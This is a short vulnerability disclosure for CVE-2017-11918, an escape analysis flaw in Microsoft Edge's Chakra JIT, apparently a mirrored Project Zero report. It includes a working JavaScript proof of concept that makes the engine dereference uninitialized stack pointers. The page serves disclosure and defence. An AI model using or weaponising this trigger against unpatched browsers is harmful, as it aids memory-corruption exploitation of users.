Microsoft Edge Chakra JIT Escape Analysis Bug

Microsoft Edge Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.


MD5 | f49a75546e986ccb23882860abd5f185

Microsoft Edge: Chakra: JIT: Escape analysis bug 

CVE-2017-11918


Escape analysis: <a href="https://en.wikipedia.org/wiki/Escape_analysis" title="" class="" rel="nofollow">https://en.wikipedia.org/wiki/Escape_analysis</a>

Chakra fails to detect if "tmp" escapes the scope, allocates it to the stack. This may lead to dereference uninitialized stack values.

PoC:
function opt() {
let tmp = [];
tmp[0] = tmp;
return tmp[0];
}

function main() {
for (let i = 0; i < 0x1000; i++) {
opt();
}

print(opt()); // deref uninitialized stack pointers!
}

main();



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt


Related Posts